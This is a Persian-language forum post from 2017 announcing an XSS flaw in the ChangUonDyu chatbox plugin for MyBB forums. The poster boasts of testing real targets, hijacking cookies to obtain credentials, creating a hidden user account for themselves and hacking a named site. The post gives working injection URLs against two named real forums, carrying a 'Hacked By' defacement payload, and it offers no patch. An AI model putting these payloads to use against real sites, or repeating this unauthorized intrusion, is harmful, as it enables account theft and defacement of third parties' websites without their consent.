+- انجمن های تخصصی فلش خور (http://www.flashkhor.com/forum)
+-- انجمن: رایانه (http://www.flashkhor.com/forum/forumdisplay.php?fid=27)
+--- انجمن: آموزش رایانه و اینترنت (http://www.flashkhor.com/forum/forumdisplay.php?fid=60)
+--- موضوع: بسیار مهم> ChangUonDyu Chatbox Plugin XSS< (/showthread.php?tid=264707)
بسیار مهم> ChangUonDyu Chatbox Plugin XSS< - امیرحسین - 06-03-2017
لام و درود
دیگه از عنوان معلومه میخوام چی بگم بنده چندروز پیش داشتم چندتا تارگت رو تست میزدم انجمن مای بی بی بودند
باگ XSS هس در قسمت چت باکس مای بی بی و اسم پلاگین هم ChangUonDyu
که میشه با هایجکت کوکی ها یوزر و پسورد رو خوند و دیفیس(هک) کرد که تیم امنیتی مسیح تیم هم این باگ رو داشت که بنده برای خودم یه یوزر مخفی ساختم و.....
======================================
اگه به آدرس زیر برید
و این سایت رو Hک کردم که خودشون گفتن که سایتشون Hک شده بودکد php:
کد:
http://forum.tahaquran.ir/chatbox/archive.php?page=13 نمونه ای از آسیب پذیری:
کد php:
کد:
http://forum.tahaquran.ir/chatbox/archive.php?page=%3Cmarquee%3EHacked%20By%20EbRaHiM-VaKeR%3C/marquee%3E کد php:
کد:
http://mihan-forum.ir/chatbox/archive.php?page=%3Cmarquee%3EHacked%20By%20EbRaHiM-VaKeR%3C/marquee%3E متاسفانه بنده راه پچ این باگ رو بلد نیستم واگر نه راه پیشگیری رو میزاشتم